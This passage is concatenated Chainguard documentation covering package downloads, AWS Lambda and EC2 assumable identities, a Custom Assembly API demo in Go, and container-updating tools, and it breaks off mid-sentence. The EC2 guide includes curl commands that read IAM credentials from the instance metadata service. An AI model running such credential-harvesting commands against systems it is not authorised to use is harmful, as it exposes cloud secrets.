apiflask-0.12.0.tar.gz ... Each package name is a link to the specific binary. The link includes long unique identifiers and cannot be determined without browsing. The list uses ascending order for the full name including the version. Use the search functionality on pypi.org to locate packages of interest and then browse in the simple index to determine available versions in Chainguard Libraries for Python. Use curl, specifying the username and password retrieved with chainctl, and use the URL of the file to download and save the file with the original name: With .netrc authentication: curl -n -L -O https://libraries.cgr.dev/files/... With environment variables: curl -L --user "$CHAINGUARD_PYTHON_IDENTITY_ID:$CHAINGUARD_PYTHON_TOKEN" \ -O https://libraries.cgr.dev/files/... The option -L is required to follow redirects for the actual file locations. The Chainguard Libraries for Python repository does not include all packages from PyPI. Chainguard Libraries for Python are rebuilt from source and require that source be available.
Therefore, packages that do not provide a valid source URL cannot be rebuilt within the Chainguard Factory. Since the Chainguard Libraries for Python index is not complete, you should strongly consider setting the PyPI public package index as a fallback within your repository manager. In this case, failed requests are logged by Chainguard and, where possible, the package is prioritized for a new build from source. Typically, access is configured globally on a repository manager for your organization. Alternatively, you can use the token for direct access to the Chainguard Libraries for Python index as discussed in Build configuration. --- ### Create an Assumable Identity for an AWS Lambda Role URL: https://edu.chainguard.dev/chainguard/administration/assumable-ids/identity-examples/aws-lambda-identity/ Last Modified: March 21, 2025 Tags: Chainguard Containers, Product, Procedural Chainguard’s assumable identities are identities that can be assumed by external applications or workflows in order to perform certain tasks that would otherwise have to be done by a human. This procedural tutorial outlines how to create an identity using Terraform, and then create an AWS role that will assume the identity to interact with Chainguard resources. This can be used to authorize requests from AWS Lambda, ECS, EKS, or any other AWS service that supports IAM roles for service accounts. Prerequisites To complete this guide, you will need the following. terraform installed on your local machine. Terraform is an open-source Infrastructure as Code tool that this guide will use to create various cloud resources. Follow the official Terraform documentation for instructions on installing the tool. chainctl — the Chainguard command line interface tool — installed on your local machine. Follow our guide on How to Install chainctl to set this up. An AWS account with the AWS CLI installed and configured. The Terraform provider for AWS uses credentials configured via the AWS CLI. A recent version of Go to test the identity with AWS Lambda. Creating Terraform Files We will be using Terraform to create an identity for an AWS role to assume. This step outlines how to create the Terraform configuration files that, together, will produce such an identity. These files are available in Chainguard’s GitHub Repository of Platform Examples. To help explain each configuration file’s purpose, we will go over what they do one by one. First, though, create a directory to hold the Terraform configuration and navigate into it. mkdir ~/aws-id && cd $_ This will help make it easier to clean up your system at the end of this guide. main.tf The first file, which we will call main.tf, will serve as the scaffolding for our Terraform infrastructure. The file will consist of the following content. terraform { required_providers { aws = { source = "hashicorp/aws" } chainguard = { source = "chainguard-dev/chainguard" } ko = { source = "ko-build/ko" } } } This is a fairly barebones Terraform configuration file, but we will define the rest of the resources in the other two files. In main.tf, we declare and initialize the Chainguard Terraform provider. Next we’ll create lambda.tf to define the AWS resources to run the Lambda function, and chainguard.tf to define the Chainguard resources that the Lambda function will interact with. lambda.tf The lambda.tf file describes the AWS role that a Lambda function will run as.
data "aws_iam_policy_document" "lambda" { statement { effect = "Allow" actions = ["sts:AssumeRole"] principals { type = "Service" identifiers = ["lambda.amazonaws.com"] } } } data "aws_iam_policy" "lambda" { name = "AWSLambdaBasicExecutionRole" } resource "aws_iam_role" "lambda" { name = "aws-auth" assume_role_policy = data.aws_iam_policy_document.lambda.json managed_policy_arns = [data.aws_iam_policy.lambda.arn] } This describes an AWS role that a Lambda function will run as. The Lambda function will assume this role, and then use the Chainguard identity to interact with Chainguard resources. The lambda.tf file also creates an AWS Lambda function that will assume the identity you created in the previous section. This function will then use the identity to interact with Chainguard resources. The final section defines a AWS lambda function implemented in Go that will assume the identity you created in the previous section: resource "aws_lambda_function" "test_lambda" { filename = "lambda_function_payload.zip" function_name = "lambda_function_name" role = aws_iam_role.iam_for_lambda.arn handler = "bootstrap" source_code_hash = data.archive_file.lambda.output_base64sha256 runtime = "go1.x" } Check out this basic example for configuring AWS Lambda using Terraform, and the docs for deploying Go Lambda functions with .zip file archives for more information on how to configure the filename and source_code_hash fields. Below we’ll go over some of the specific details from the example Go application. After it’s deployed, when this function is invoked, it will assume the AWS role you created in the previous section. It will then be able to present credentials as that AWS role that will allow it to assume the Chainguard identity you created in the previous section, to view and manage Chainguard resources. Next, you can create the chainguard.tf file. chainguard.tf chainguard.tf will create a few resources that will help us test out the identity. resource "chainguard_group" "example-group" { name = "example-group" description = <<EOF This organization simulates an end-user organization, which the AWS role identity can interact with via the identity in aws.tf. EOF } This section creates a Chainguard IAM organization named example-group, as well as a description of the organization. This will serve as some data for the identity to access when we test it out later on. Then we’ll define a Chainguard identity that can be assumed by the AWS role created in lambda.tf above: resource "chainguard_identity" "aws" { parent_id = data.chainguard_group.example-group.id name = "aws-auth-identity" description = "Identity for AWS Lambda" aws_identity { aws_account = data.aws_caller_identity.current.account_id aws_user_id_pattern = "^AROA(.*):${local.lambda_name}$" // NB: This role will be assumed so can't use the role ARN directly. We must use the ARN of the assumed role aws_arn = "arn:aws:sts::${data.aws_caller_identity.current.account_id}:assumed-role/${aws_iam_role.lambda.name}/${local.lambda_name}" } } The most important part of this section is the aws_identity block. When the AWS role tries to assume this identity later on, it must present a token matching the aws_account, aws_user_id_pattern, and aws_arn specified here in order to do so. The aws_user_id_pattern field configures the identity to be assumable only by the AWS role with the specified name, which is itself assumed by another execution role, which we’ll configure below. 
Because this role will be assumed, you can’t use the role ARN directly in aws_arn; you must use the ARN of the assumed role. The section after that looks up the viewer role. data "chainguard_role" "viewer" { name = "viewer" } The final section grants this role to the identity on the example-group. resource "chainguard_rolebinding" "view-stuff" { identity = chainguard_identity.aws.id group = data.chainguard_group.example-group.id role = data.chainguard_role.viewer.items[0].id } After defining these resources, there are some other resources in the example directory that build and deploy a Lambda function that assumes the identity. We’ll describe that code in the next section. With these resources defined, your Terraform configuration will be ready. Now you can run a few terraform commands to create the resources defined in your .tf files. Creating Your Resources First, run terraform init to initialize Terraform’s working directory. terraform init Then run terraform plan. This will produce a speculative execution plan that outlines what steps Terraform will take to create the resources defined in the files you set up in the last section. terraform plan Then apply the configuration. terraform apply Before going through with applying the Terraform configuration, this command will prompt you to confirm that you want it to do so. Enter yes to apply the configuration. ... Plan: 8 to add, 0 to change, 0 to destroy. Changes to Outputs: + aws-identity = (known after apply) Do you want to perform these actions? Terraform will perform the actions described above. Only 'yes' will be accepted to approve. Enter a value: After typing yes and pressing ENTER, the command will complete and will output an aws-identity value. ... Apply complete! Resources: 8 added, 0 changed, 0 destroyed. Outputs: aws-identity = "<your identity>" This is the identity’s UIDP (unique identity path), which you configured the chainguard.tf file to emit in the previous section. Note this value down, as you’ll need it to set up the AWS role you’ll use to test the identity. If you need to retrieve this UIDP later on, though, you can always run the following chainctl command to obtain a list of the UIDPs of all your existing identities. chainctl iam identities ls Testing the Identity When the AWS Lambda function is invoked, first it needs to get its credentials, which assert that it is the AWS IAM role defined earlier. The example code in Go does this with aws-sdk-go-v2: // Get AWS credentials. cfg, err := config.LoadDefaultConfig(ctx) if err != nil { return "", fmt.Errorf("failed to load configuration, %w", err) } creds, err := cfg.Credentials.Retrieve(ctx) if err != nil { return "", fmt.Errorf("failed to retrieve credentials, %w", err) } These credentials represent the AWS role assumed by the Lambda function ("aws-auth" defined above in lambda.tf). You can use the Chainguard SDK for Go to generate a token that Chainguard understands, to authenticate the Lambda function as the Chainguard identity you created earlier, by its UIDP: // Generate a token and exchange it for a Chainguard token.
awsTok, err := aws.GenerateToken(ctx, creds, env.Issuer, env.Identity) if err != nil { return "", fmt.Errorf("generating AWS token: %w", err) } exch := sts.New(env.Issuer, env.APIEndpoint, sts.WithIdentity(env.Identity)) cgtok, err := exch.Exchange(ctx, awsTok) if err != nil { return "", fmt.Errorf("exchanging token: %w", err) } The resulting token, cgtok, can be used to authenticate requests to the Chainguard API: // Use the token to list repos in the organization. clients, err := registry.NewClients(ctx, env.APIEndpoint, cgtok) if err != nil { return "", fmt.Errorf("creating clients: %w", err) } ls, err := clients.Registry().ListRepos(ctx, &registry.RepoFilter{ Uidp: &common.UIDPFilter{ ChildrenOf: env.Group, }, }) Removing Sample Resources To remove the resources Terraform created, you can run the terraform destroy command. terraform destroy This will destroy the role-binding and the identity created in this guide, along with all the AWS resources defined earlier in chainguard.tf and lambda.tf. However, you’ll need to delete the example-group organization yourself with chainctl. chainctl iam organizations rm example-group You can then remove the working directory to clean up your system. rm -r ~/aws-id/ Following that, all of the example resources created in this guide will be removed from your system. Learn more For more information about how assumable identities work in Chainguard, check out our conceptual overview of assumable identities. Additionally, the Terraform documentation includes a section on recommended best practices which you can refer to if you’d like to build on this Terraform configuration for a production environment. --- ### Create an Assumable Identity to Authenticate from an EC2 Instance URL: https://edu.chainguard.dev/chainguard/administration/assumable-ids/identity-examples/aws-ec2-identity/ Last Modified: March 31, 2025 Tags: Chainguard Containers, Product, Procedural Chainguard’s assumable identities are identities that can be assumed by external applications or workflows in order to access Chainguard resources or perform certain actions. This procedural tutorial outlines how to create a Chainguard identity that can then be assumed by an AWS role and used to authorize requests from an Amazon EC2 instance, allowing you to interact with Chainguard resources remotely. Prerequisites To complete this guide, you will need the following. An Amazon EC2 instance with an IAM Instance role (with or without any AWS permissions). The default sts:AssumeRole is sufficient for this guide. This guide assumes you have the AWS CLI installed on your EC2 instance. Review the official documentation for information on how to install or update to the latest version of the tool. Finally, you’ll need chainctl — the Chainguard command line interface tool — installed on both your EC2 instance and your local machine. Follow our guide on How to Install chainctl to set this up. Create a Chainguard Assumable Identity To get started, you will need to retrieve some details about the AWS IAM user on your EC2 instance. You will use these details to create a Chainguard identity that the EC2 user will employ to authenticate to Chainguard.
Run the following command from your EC2 instance: aws sts get-caller-identity This will return information like the following: { "UserId": "AROAWSexampleC2UL7LUB:i-05a6373ad7171fed2", "Account": "453EXAMPLE43", "Arn": "arn:aws:sts::452example43:assumed-role/AmazonSSMRoleForInstancesQuickSetup/i-05a6373examplehd2" } From your local machine, use this information to create a JSON file named id.json which you’ll use to define the identity your EC2 instance will use to authenticate to Chainguard: cat > id.json <<EOF { "name":"aws-ec2-identity", "awsIdentity": { "aws_account" : "$ACCOUNT", "arnPattern" : "$ARN", "userIdPattern" : "$USER-ID" } } EOF Note that this identity definition specifies the name of the Chainguard identity as aws-ec2-identity. Be sure to change these placeholder values to reflect the output from the aws sts get-caller-identity command you ran on your EC2 instance. Next, use chainctl to authenticate to your Chainguard account: chainctl auth login After authenticating to Chainguard, you can create an identity that your EC2 instance will be able to assume. First, though, you’ll need to know the name of the Chainguard organization you want the assumable identity to be associated with. To retrieve a list of all the organizations you have access to, run the following command: chainctl iam organizations ls -o table Find the organization you want to use and copy the value from its NAME column exactly. You can then use this to create a new Chainguard identity. The following example uses the id.json file you created earlier as the identity definition and associates it with the chainguard.edu organization: chainctl iam id create aws --filename id.json -oid --parent chainguard.edu Be sure to change the chainguard.edu placeholder to reflect the name of your own Chainguard organization. This command will return a value like the following: . . . 45a0cEXAMPLE977f050c5fb9ac06a69EXAMPLE95/2c5f7EXAMPLE3871 Note this value down, as you will need it in the next section when you authenticate to Chainguard from your EC2 instance using this identity. Before moving on, you must create a role-binding to bind the identity you just created to a specific role: chainctl iam rolebinding create --identity aws-ec2-identity --role viewer --parent chainguard.edu This example binds the aws-ec2-identity to the viewer role, but you can bind it to any role you’d like. For a full list of available roles, you can run the chainctl iam roles list command. Again, be sure to change chainguard.edu to reflect the name of your own organization, and change aws-ec2-identity to the name of the identity you created previously, if different. Following that, you can move on to the next section where you will authenticate to Chainguard from your EC2 instance using the identity you created. Authenticate from EC2 Using the Newly Created Identity Now that you’ve created a Chainguard identity, you can use it to connect to Chainguard from your EC2 instance. This section outlines how to set this up. Note: All the commands in this section should be run from your EC2 instance.
From your EC2 instance, create an environment variable named $CHAINGUARD_IDENTITY that contains the ID value for the aws-ec2-identity Chainguard identity you created in the previous section: export CHAINGUARD_IDENTITY=45a0cEXAMPLE977f050c5fb9ac06a69EXAMPLE95/2c5f7EXAMPLE3871 If you forgot to note down the identity’s ID value, you can retrieve a list of all your available Chainguard identities (along with their ID values) by running the chainctl iam identities list -o table command on your local machine. Next, you’ll need to get the EC2 instance’s credentials from the Instance Metadata Service. To do this, first create a session token with the following command: TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600") This creates a session token that will last for six hours (21600 seconds) and stores the token in a variable named $TOKEN. Next, you’ll need to find the role associated with the instance. The following command retrieves this role while storing it in a variable named $ROLE: ROLE=$(curl -H "X-aws-ec2-metadata-token: $TOKEN" -s http://169.254.169.254/latest/meta-data/iam/security-credentials/) Following that, you can run a nearly identical command to retrieve the necessary security credentials, this time without storing the results in an environment variable and specifying the IAM role you just retrieved: curl -H "X-aws-ec2-metadata-token: $TOKEN" -s http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE This will return output like the following: { "Code": "Success", "LastUpdated": "2025-03-13T23:05:07Z", "Type": "AWS-HMAC", "AccessKeyId": "ASEXAMPLE3EFACCESS3KEYS", "SecretAccessKey": "gFQYvEXAMPLEqlISECRETdgACCESSdzlZlKEY56h", "Token": "IQoJb3JpZ2luXEXAMPLE2Vj. . .", "Expiration": "2025-03-14T05:29:15Z" } Based on this output, create three environment variables: $AWS_ACCESS_KEY_ID, which will hold the AccessKeyId value $AWS_SECRET_ACCESS_KEY, which will hold the SecretAccessKey value $AWS_SESSION_TOKEN, to hold the Token value export AWS_ACCESS_KEY_ID="ASEXAMPLE3EFACCESS3KEYS" export AWS_SECRET_ACCESS_KEY="gFQYvEXAMPLEqlISECRETdgACCESSdzlZlKEY56h" export AWS_SESSION_TOKEN="IQoJb3JpZ2luXEXAMPLE2Vj. . ." Note: You can retrieve the security credentials and store them in the appropriate variables with the following one-line command, which will reduce the amount of copying and pasting you need to do: curl -H "X-aws-ec2-metadata-token: $TOKEN" -s http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE | jq -j '"export AWS_ACCESS_KEY_ID=", .AccessKeyId, "\nexport AWS_SECRET_ACCESS_KEY=", .SecretAccessKey,"\nexport AWS_SESSION_TOKEN=" , .Token' > vars && source ./vars Using these variables, as well as the Chainguard identity you set up previously, you can send a request to the AWS Security Token Service to retrieve a short-lived token which will be used to authenticate with chainctl.
This command stores the token in a variable named $TOK: TOK=$(curl -X POST "https://sts.amazonaws.com/?Action=GetCallerIdentity&Version=2011-06-15" \ --aws-sigv4 "aws:amz:us-east-1:sts" \ -H "x-amz-security-token: $AWS_SESSION_TOKEN" \ --user "$AWS_ACCESS_KEY_ID":"$AWS_SECRET_ACCESS_KEY" \ -H "Chainguard-Identity: $CHAINGUARD_IDENTITY" \ -H "Chainguard-Audience: https://issuer.enforce.dev" \ -H "Accept: application/json" \ -v 2>&1 > /dev/null | grep '^> ' | sed 's/> //' | base64 -w0) Finally, use this token — along with the $CHAINGUARD_IDENTITY variable — to authenticate to Chainguard from your EC2 instance: chainctl auth login --identity-token $TOK --identity $CHAINGUARD_IDENTITY Successfully exchanged token. Valid! Id: 45a0cEXAMPLE977f050c5fb9ac06a69EXAMPLE95/2c5f7EXAMPLE3871 With that, your EC2 instance will have access to your Chainguard resources. Remember that the level of access is determined by the role you bound to the identity in the previous section; if you followed this example closely, then this identity will be bound to the viewer role. Learn more By following this guide, you will have created a Chainguard identity that you can use to authenticate to Chainguard from an Amazon EC2 instance. For more information about how assumable identities work in Chainguard, check out our conceptual overview of assumable identities. Additionally, we encourage you to read through the rest of our documentation on Administering Chainguard resources. --- ### Using the Chainguard API to Manage Custom Assembly Resources URL: https://edu.chainguard.dev/chainguard/chainguard-images/features/ca-docs/custom-assembly-api-demo/ Last Modified: May 1, 2025 Tags: Chainguard Containers, Product, Procedural Chainguard’s Custom Assembly is a tool that allows customers to create customized containers with extra packages added. This enables customers to reduce their risk exposure by creating container images that are tailored to their internal organization and application requirements while still having few-to-zero CVEs. You can use the Chainguard API to further customize your Custom Assembly builds and retrieve information about them. This tutorial highlights a demo application (which can be found in Chainguard Academy’s Demo Applications repository) which, when run, updates a Custom Assembly container’s configuration based on a provided YAML file. Prerequisites In order to follow along with this guide, you will need the following: Access to a Custom Assembly container image. If your organization doesn’t yet have access to Custom Assembly, reach out to your account team to start the process. The demo application used in this guide is written in Go, so you will need Go installed on your local machine. Refer to the official Go documentation for instructions on downloading and installing Go. You will also need chainctl installed on your local machine to create a Chainguard token and authenticate to the Chainguard API. Downloading the Demo Application This step involves downloading the demo application code to your local machine. To ensure that the application files don’t remain on your system, navigate to a temporary directory like /tmp/: cd /tmp/ Your system will automatically delete the /tmp/ directory’s contents the next time it shuts down or reboots. The code that comprises this demo application is hosted in a public GitHub repository managed by Chainguard. 
Pull down the example application files from GitHub with the following command: git clone --sparse https://github.com/chainguard-dev/edu-images-demos.git Because this guide’s demo application code is stored in a repository with other examples, we don’t need to pull down every file from this repository. For this reason, this command includes the --sparse option. This initializes a sparse-checkout file, causing the working directory to contain only the files in the root of the repository until the sparse-checkout configuration is modified. Navigate into this new directory and list its contents to confirm this: cd edu-images-demos/ && ls For now, this directory only contains the repository’s LICENSE and README files: LICENSE README.md To retrieve the files you need for this tutorial’s sample application, run the following git command: git sparse-checkout set custom-assembly-go This modifies the sparse-checkout configuration initialized in the previous git clone command so that the checkout only consists of the repo’s custom-assembly-go directory. Navigate into this new directory: cd custom-assembly-go/ From here, you can run the application and use it to update the packages built into a Custom Assembly container. First, though, let’s go through the main.go file, where the executable application code is written, in order to understand how it works. Understanding the Demo Application Before outlining how to run the demo application to update a Custom Assembly container image, it’s important that you have a general understanding of how the application works. This section will only provide a general overview of the application. We encourage you to read through the complete application, as it includes comments that explain what each portion of the code does. Imports The demo application uses the following packages: import ( "context" "flag" "fmt" "log" "os" "strings" "time" . . . ) The application also uses the Chainguard SDK to interact with the Chainguard API and demonstrates proper patterns for authentication, error handling, and resource management. For this reason, the import section also brings in a number of protos from github.com/chainguard-dev/sdk, the GitHub repository that stores Chainguard’s public SDK for integrating with the Chainguard platform: import ( . . . "chainguard.dev/sdk/auth" "chainguard.dev/sdk/proto/platform" commonv1 "chainguard.dev/sdk/proto/platform/common/v1" "chainguard.dev/sdk/proto/platform/iam/v1" registryv1 "chainguard.dev/sdk/proto/platform/registry/v1" "gopkg.in/yaml.v2" ) Note that the imports block also contains gopkg.in/yaml.v2, the import path for the yaml package. This will allow the application to decode YAML values. Constants Immediately below the imports, the application creates a few constants used throughout the code: const ( defaultAPIURL = "https://console-api.enforce.dev" tokenEnvVariable = "TOK" defaultGroupName = "ORGANIZATION" demoRepoName = "CUSTOM-IMAGE-NAME" buildConfigFile = "build.yaml" ) defaultAPIURL: This points to the Chainguard API’s URL, which the application will reach in order to interact with the API. tokenEnvVariable: In order to use the Chainguard API, you must authenticate to prove that you have access to the resources you want to interact with. This constant defines an environment variable TOK that the application will expect to be present in order to function. This variable must hold a Chainguard authentication token; the next section describes how to create this environment variable.
defaultGroupName: This constant points to the Chainguard organization whose Custom Assembly resources you would like to manage. demoRepoName: This constant points to the name of the Custom Assembly container image that you’d like to update with this demo application. buildConfigFile: This last constant points to the build.yaml file, which you’ll use to configure the Custom Assembly container image. Functions Following the list of constants, the application declares a series of functions: listRepositories: This function lists repositories in a group with optional name filtering. listBuildReports: Lists build reports for a repository. Build reports provide information about image builds, including status, timestamps, and digests of the resulting images. This function shows how to query build reports for a specific repository. printBuildReports: This helper function displays build reports in a user-friendly format, showing the start time, result status, and image digest for each report. applyCustomization: This function demonstrates the pattern for updating a repository with a custom overlay that defines the packages to include in the image. The overlay is applied to the repository, which triggers a new build. createClient: This function creates a new Chainguard API client using a token from the environment. confirmAction: This utility function handles user confirmation for potentially destructive actions. These functions come together in the main() function, which performs five main steps: Create a Chainguard API client and authenticate List repositories with optional filtering List existing build reports for the repository Apply image customizations using a build.yaml file List and monitor new build reports To accomplish all this, the application’s functions perform the following API calls: ListBuildReports ListRepos UpdateRepo Groups_List For a deeper understanding of what each function does and how the application works overall, we encourage you to closely review the main.go file before running it. You may also benefit from reviewing our OpenAPI Specification reference document. Once you feel you have a grasp on how the demo application works, move on to the next section which outlines how to run it. Running the Demo Application Before you can run the demo application, there are a few steps you need to take in order for it to work properly. First, run the following go commands: go mod init github.com/chainguard-dev/sdk && go mod tidy The go mod init command will initialize a new go.mod file in the current directory. Including the github.com/chainguard-dev/sdk URL tells Go to use that as the module path. The go mod tidy command ensures that the new go.mod file matches the source code in the module. As mentioned previously, you must authenticate before you can interact with the Chainguard API. For this reason, this demo application expects an environment variable named TOK to be present when it’s run. Create this environment variable with the following command: export TOK=$(chainctl auth token) Following that, open up main.go with your preferred text editor. This example uses nano: nano main.go From there, edit the following lines: // Group and repository settings defaultGroupName = "ORGANIZATION" demoRepoName = "CUSTOM-IMAGE-NAME" Replace ORGANIZATION with the name of your organization’s repository within the Chainguard registry. This usually takes the form of a domain name, such as example.com. Additionally, replace CUSTOM-IMAGE-NAME with the name of a Custom Assembly image. 
This is typically a name like custom-nginx or custom-python. Save and close the main.go file. If you used nano, you can do so by pressing CTRL+X, Y, and then ENTER. Next, open up the build.yaml file: nano build.yaml This file will have the following content: contents: packages: - wolfi-base - go Here, replace wolfi-base and go with whatever packages you’d like to be included in the customized container image. Note that you can only add packages that your organization already has access to, based on the Chainguard Containers you have already purchased. Refer to the Custom Assembly Overview for more details on the limitations of what packages you can add to a Custom Assembly image. Save and close the build.yaml file. Finally, you can run the application to apply the configuration listed in the build.yaml file to your organization’s Custom Assembly image: go run main.go The application will start by listing the information outlined previously, including the specified organization’s repositories and build reports for the chosen Custom Assembly image: Group: example.com (ID: 45a0cEXAMPLE977f050c5fb9aEXAMPLEed764595) All repositories in example.com: - custom-assembly - nginx - curl Repository: custom-assembly (ID: 45a0cEXAMPLE977f050c5fb9aEXAMPLEed764595/c375EXAMPLEb500c) Build Reports for custom-node repository: . . . It will then prompt you to confirm that you want to apply the customization configuration listed in the build.yaml file: About to apply customization using configuration file: build.yaml Are you sure you want to update repository custom-node? (y/n): y Enter y to confirm. Then, if everything was configured correctly, the application output will show successful build reports: . . . - Started: Mon, 28 Apr 2025 00:28:44 UTC, Result: Success, Digest: . . . Troubleshooting Although the demo application has been tested to ensure that it works properly, there are several pitfalls you may encounter when attempting to run it. For example, you may run into an error like the following: Failed to list groups: rpc error: code = Internal desc = stream terminated by RST_STREAM with error code: PROTOCOL_ERROR This may indicate that there is an issue with your Chainguard authentication token. To resolve this, try recreating the environment variable that holds the token: export TOK=$(chainctl auth token) You may also encounter errors like the following: cannot find package "chainguard.dev/sdk/auth" . . . This may indicate that the Chainguard SDK wasn’t imported correctly. Be sure that you run the following commands to set this up: go mod init github.com/chainguard-dev/sdk && go mod tidy Again, the main.go file contains many comments that explain each portion of the code. If you encounter any errors, we encourage you to review the file closely to better understand how the application works and what might be going wrong. Learn More The example application highlighted in this guide is intended to show how you can manage Custom Assembly resources with the Chainguard API. To learn more about Custom Assembly, you can refer to the Custom Assembly Overview. Be aware that it’s also possible to edit a Custom Assembly container’s configuration using chainctl. Check out our documentation on the subject for more information.
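As a final note related to the Troubleshooting section above, a minimal sketch for avoiding a stale token is to mint it in the same command that runs the application. This assumes you are in the custom-assembly-go directory and have already edited main.go and build.yaml as described earlier.

```sh
# Sketch: refresh the Chainguard token and run the demo in one step,
# so an expired TOK value exported in an earlier session isn't reused.
TOK=$(chainctl auth token) go run main.go
```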
--- ### Strategies and Tooling for Updating Containers URL: https://edu.chainguard.dev/chainguard/chainguard-images/staying-secure/updating-images/strategies-tools-updating-images/ Last Modified: December 2, 2024 Tags: Chainguard Containers, Product When it comes to keeping a system secure, one of the most important measures you can take is to regularly apply updates. In modern, containerized infrastructures, this normally means updating containers to use only the latest container images that are still maintained. A casual observer might expect such a standard and important task to have agreed-on best practices and standardized tooling, but they might be surprised by the wide variety of different solutions and opinions on this problem. This conceptual article will delve into some of the options and offer guidance on which might work best for readers. This article assumes that you are familiar with semantic versioning (SemVer) and image tagging. If you aren’t acquainted with these concepts, please check out this guide on Considerations for Keeping Containers Up to Date. Updating Means Risk The core issue with applying updates is that it’s a fundamentally risky endeavor; any update to software risks a change to behavior and system breakages. It’s a common practice to avoid major updates for weeks or even months in order to ensure bugs have been worked out before upgrading. Larger software projects (like PostgreSQL, Java, and Node.js) often have multiple supported versions of their project at the same time. This means that users can stay on an older version and avoid the riskier updates while still getting security patches. Although this approach is helpful to operations teams, it is only practical on large projects with paid maintainers that can spend time backporting fixes. Smaller projects will often struggle with just keeping the main version up to date. Not Updating Means More Risk End of Life (EOL) software presents a host of security risks. Upgrading may require a great deal of work and proper testing, but it’s a small price to pay to keep your systems from being at risk and accruing technical debt. If your application has an automated test suite with good coverage, you can be confident that any breakages caused by upgrades will be caught before deployment to production. Of course, whenever a test failure occurs, there will be work required to address it. Putting off that work by delaying upgrades will only mean that more work is required in the future as further changes pile up. Another way organizations test and reduce the risk of breaking changes introduced by updates is through the use of staging environments where changes are tried out before being pushed to production. An alternative approach to this is testing in production, which usually involves using techniques like feature flags and staged updates to verify the effects of changes before they impact the majority of users. Knowing When Updates are Available The primary way of knowing when a new image is available is through the registry itself. Many registries will offer a webhook callback service (Docker Hub, for example), but this is typically only for your own repositories. If you want to get notified when a public repository is updated, you’ll generally have to use a third-party service like NewReleases. If you’re trying to find out how outdated the images in your Kubernetes cluster are, you might find the version-checker project to be useful.
This is a Kubernetes utility that will create an inventory of your current images and produce a chart showing how out of date they are. The dashboard can form part of a full solution with notifications for outdated software being sent to cluster administrators for mitigation. Updating Solutions This section outlines some commonly employed solutions for keeping images up to date. We’ll only consider solutions that involve automation — you could argue that kubectl set image is an updating solution, but it would only be scalable as part of an automated pipeline. Using latest or major version tags One common strategy is to only use the latest tag or major version tags. This means having something like the following in your Dockerfile: FROM cgr.dev/chainguard/redis:3 Or, if you’re using a Kubernetes manifest, you might have a line like this: image: cgr.dev/chainguard/redis:latest The tag used will determine the jump in the updated version; latest will jump major versions, so typically a major or minor tag is chosen to limit the size of changes. The goal for this strategy is to update the image whenever it is rebuilt or redeployed. However, the reality is that this approach is still dependent on caching and configuration (especially the image pull policy) and it may take considerable time before redeployment. One major issue with this approach is that you lack control and reproducibility over the images that will be deployed. In Kubernetes you can end up with different pods in the same deployment running different versions of the application because nodes pulled the image at slightly different times. Debugging can become difficult, as you can’t easily recreate the system. You can’t even say for sure what is running in the cluster, which will be a big problem when you need to respond to a security situation. The advantage of this approach is that it is relatively simple, requires little maintenance, and will keep up to date with changes over time, meaning it’s often appropriate for simple projects or example code. However, it’s recommended that you don’t deploy the latest tag to production, as doing so can present its own risks. Keel Keel is a Kubernetes Operator that will automatically update Kubernetes manifests and Helm charts. It has multiple options for finding updates — typically using webhooks from registries and falling back to polling for new versions. Updates are controlled through policies which cover the normal cases. GitOps: Flux and ArgoCD GitOps is a set of practices that leverage Git as a single source of truth for infrastructure automation. The two leading GitOps solutions for updating images are Flux and ArgoCD (though there are also newer solutions gaining traction including fleet and kluctl). Flux Flux uses an ImageRepository custom resource that polls repositories for updates. There is also support for webhooks via the Notification Controller. An ImagePolicy custom resource defines what tags we’re interested in — typically you will use a SemVer policy, such as range: 5.0.x, to get minor updates. An ImageUpdateAutomation resource then defines how to handle updates, such as by checking in an update commit directly or committing to a new branch and opening a GitHub pull request for manual approval. There is also support for reverting updates and suspending automation to support incident response. ArgoCD ArgoCD has a separate Image Updater project that can be used to automate updates. Rather than creating new resources, ArgoCD relies on annotations being added to existing manifests.
Update strategies are similar to Flux, with support for SemVer and regular expressions to filter tags. Unlike Flux, there is currently no support for webhooks, but this could change in the future. ImageStreams OpenShift has the concept of ImageStreams for handling updates. ImageStreams are a “virtual view” on top of images. Deployments and builds can listen for ImageStream notifications to automatically update for new versions. The underlying data for an ImageStream comes from registries, but decoupling this data means it is possible to have different versions in the ImageStream and on the registry. This in turn allows for processes such as rolling back a deployment without retagging images on the registry. The ImageStream itself is represented as a custom resource which contains a history of previous digests, ensuring that rollbacks are possible even when tags are overwritten (assuming the image isn’t deleted). Frizbee and digestabot A best practice in supply chain security is to specify GitHub Actions and container images by their digest. The digest is a content-based SHA that is guaranteed to always refer to exactly the same version of the action or image, whose contents are guaranteed not to have changed. In other words, digests are immutable, meaning that they can’t be changed to point to something else. The disadvantages are that digests aren’t human-readable and you need to keep updating them to stay up to date. However, it is possible to get something human-readable as well as immutable. The following are valid image references which specify both a meaningful tag and an immutable digest: cgr.dev/chainguard/wolfi-base:latest@sha256:3eff851ab805966c768d2a8107545a96218426cee1e5cc805865505edbe6ce92 redis:7@sha256:01afb31d6d633451d84475ff3eb95f8c48bf0ee59ec9c948b161adb4da882053 Frizbee, a tool from Stacklok, will update image references to the most up-to-date digest. For the above example, it will ask the registry for the digest of the cgr.dev/chainguard/wolfi-base:latest image and update it if it doesn’t match. At Chainguard, we take a similar approach with the digestabot tool. Digestabot is a GitHub action that will look up digests in the above format and open a PR to update them. Dependabot Dependabot is GitHub’s tool for monitoring dependencies. It can be used with GitHub, but can also be self-hosted. Dependabot is designed to work with a variety of different package ecosystems, as well as container images referenced in Dockerfiles and Kubernetes manifests. Dependabot runs on a schedule and will open pull requests to update dependencies when it finds outdated versions. Renovate Renovate is a similar solution to Dependabot and will open PRs to update out-of-date dependencies. The major difference is that Renovate is a self-hosted application that supports multiple platforms, like GitLab, Azure DevOps, and Bitbucket, instead of just GitHub. Conclusion Something as important as keeping packages up to date has more approaches and tooling than one might expect. This article has shied away from offering any clear recommendations, but this is a matter where every organization will need to choose a solution that suits its own needs. We encourage you to check out each of the solutions listed in this article and judge them on their own merits. We also suggest you read our other articles on handling EOL software, including Considerations for Keeping Containers Up to Date.
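As a closing illustration of the digest-pinning approach discussed above, one way to look up the digest for a tag is with a registry client such as crane. crane isn't part of the tooling covered in this article; it's shown here only as a sketch and assumes you have it installed.

```sh
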